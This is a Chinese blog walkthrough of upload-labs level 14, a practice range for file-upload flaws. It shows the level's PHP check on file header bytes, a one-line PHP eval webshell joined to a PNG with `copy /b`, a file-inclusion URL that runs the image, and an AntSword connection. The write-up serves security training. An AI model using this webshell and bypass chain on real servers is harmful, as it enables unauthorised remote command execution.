upload-labs第14关

最新推荐文章于 2024-06-29 11:32:49 发布
最新推荐文章于 2024-06-29 11:32:49 发布
阅读量677 收藏 6
点赞数 14
文章标签: 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73528952/article/details/139785496
版权

upload-labs第14关

第十四关

一、源代码分析

代码审计

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

在getReailFileType()函数中,对图片的头部进行了判断,图片的头部对定义特定的图片类型,所以我们在制作图片码的时候不能再头部进行改动。所以可以选择制作图片码进行绕过。

二、绕过分析

a. 制作图片码

首先需要一个照片,然后其次需要一个eval.php。

eval.php代码如下:

<?php @eval($_POST['cmd']); ?>

在windows上创建图片码

copy 1.png/b + eval.php/b c.png
/b:指定以二进制格式复制、合并文件,用于图像或者声音类文件
/a:指定以ascii格式复制、合并文件用于txt等文本类文件

在这里插入图片描述

b.上传图片码

上传成功

在这里插入图片描述

c.结合文件包含漏洞进行访问

访问:http://192.168.1.110/upload-labs-master/include.php?file=http://192.168.1.110/upload-labs-master/upload/9220240621094414.png在这里插入图片描述### d.使用中国蚁剑进行连接

在这里插入图片描述

15、16关和14关是一样的

Estera.
关注
  • 14
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Upload-labs攻略(适合新手)_upload-labs第十四
2401_83947194的博客
04-14 998
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
upload-labs10-14
weixin_67813445的博客
02-26 73
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。
文件上传漏洞的学习和总结(upload-labs第14到21)
古语静水流深
06-11 1864
第14:上传图片马来达到后门的效果。图片马如何制作呢:在cmd中执行: copy 9.jpg/b+test.php 2.php.jpg
文件上传复习(upload-labs14-17
2302_80935968的博客
04-25 864
basename— 返回路径中的文件名部分给出一个包含有指向一个文件的全路径的字符串,本函数返回基本的文件名。Notebasename()纯粹基于输入字符串操作, 它不会受实际文件系统和类似 ".." 的路径格式影响。例子如下:php?1) sudoers3) passwd4) etc5) .6)imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像。
upload-labs之第十四和十五
田田云逸的博客
10-28 2368
Pass14 打开第十四,发现任务要求跟上一是一样的。都是要求上传图片马。所以再看看提示吧。 没有说要检查文件前两个字节了,但是用了一个新的函数来检查是否为图片文件。我们先了解一下这个getimagesize()函数是干嘛的吧。 getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。函数成功返回的就是一个数组,失败则
upload-labs靶场通指南(14-15
永远是少年
09-12 1548
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场通指南(14-15)。 一、第14 二、第15 三、第16
upload-labs靶场第14、15、16环境问题说明
永远是少年
09-12 1129
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场第14、15、16环境问题说明。 一、%00截断的环境问题 二、PHP魔术引号问题 三、php_exif模块开启问题
upload-labs靶场第17设计PHP函数解析
永远是少年
09-13 815
今天继续给大家介绍渗透测试相知识,为了方便大家对upload-labs靶场第17的理解,本文主要内容是upload-labs靶场第17设计PHP函数解析。 一、move_upload_file()函数 二、imagecreatefromjpeg()函数 三、srand()函数 四、strval()函数 五、imagejpeg()函数 六、unlink()函数
upload-labs第一
LIULIUAINI66的博客
03-15 530
10、接着说浏览器的问题为啥火狐浏览器就可以edge就不行,搞不懂,但是可以在edge浏览器开发者里把JavaScript给禁用了,那它前端做的限制就没用了哈哈哈,试了一下是ok的,下面两个文件就是分别删除后缀名函数和禁用JavaScript上传的木马。6、那就看看前端代码,右键检查确实是在前端做的限制,之前看谁说一切在前端做的限制都是纸老虎,哈哈哈,对我这个小白就感觉是真老虎了,遇见一堆麻烦。5、接下来我想到在bp里抓包看看把文件后缀改了,结果发现不是后端验证的,那就是前端了。12、上传木马成功的界面。
文件上传及upload-labs
anananan145的博客
07-15 2907
文件上传
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个卡,从基础...
upload-labs19-20以及总结1
08-08
在本卡中,我们面对的是一个Web应用程序的文件上传功能。从题目描述和源码分析,我们可以看到存在几个键的防御措施,但同时也存在明显的漏洞。首先,我们需要理解文件上传的基本流程及其潜在的安全风险。...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
135-PHP、Apache环境中部署upload-labs
10-22
在部署 upload-labs 后,需要添加网站来访问 upload-labs。可以打开 PHPStudy,添加网站,并填写域名。域名需要与文件夹的名称一致,例如 upload-labs。这样可以自动填充根目录,Apache 会自动重启,访问地址为 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8309
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
自学黑客技术(网络安全)
dexi1113的博客
06-24 2785
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
web安全渗透测试十大常规项(一):web渗透测试之Fastjson反序列化
最新发布
HACKONE的博客
06-29 192
FastJson有一个全局缓存机制:在解析json数据前会先加载相配置,调用addBaseClassMappings()和loadClass()函数将一些基础类和第三方库存放到mappings中(mappings是ConcurrentMap类,所以我们在一次连接中传入两个键值a和b,之后在解析时,如果没有开启autotype,会从mappings或deserializers.findClass()函数中获取反序列化的对应类,如果有,则直接返回绕过了黑名单。,在经过黑白名单后,在加载类时会去掉前后的L和;
网络安全概论
m0_73687800的博客
06-26 473
笔者最近在复习选修的一门信息网络安全的课程,该课程上课PPT乃是纯英文,实在难以开读,转头求索,又无处可得。于是考前深夜阅读计算机网络的网络安全一章,希翼能有所收获。主动攻击:攻击者对某个连接中通过的PDU进行各种处理,共有三类:更改报文流,拒绝报文服务,伪造连接初始化。计算机网络面临四种威胁:截获,中断,篡改,伪造。这四类威胁又可分为两大类:被动攻击和主动攻击。被动攻击:仅观察分析PDU而不干扰。附加一类主动攻击:恶意程序。
upload-labs第四
04-12
upload-labs是一个用于学习和练习Web安全的在线平台,第四是一个文件上传漏洞的挑战。在这个卡中,你需要通过绕过文件类型检查,成功上传一个恶意的PHP文件。 具体步骤如下: 1. 打开upload-labs平台,并选择第四。 2. 你会看到一个文件上传的表单,可以选择一个文件并点击上传按钮。 3. 首先,尝试上传一个普通的PHP文件,比如test.php。如果上传成功并且可以访问该文件,说明存在文件类型检查漏洞。 4. 如果上传失败或者无法访问上传的PHP文件,说明存在文件类型检查。这时,你需要绕过文件类型检查。 5. 一种常见的绕过方法是修改文件的扩展名。尝试将test.php改为test.php.jpg或者test.php.png,并重新上传。 6. 如果上传成功并且可以访问该文件,说明成功绕过了文件类型检查。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值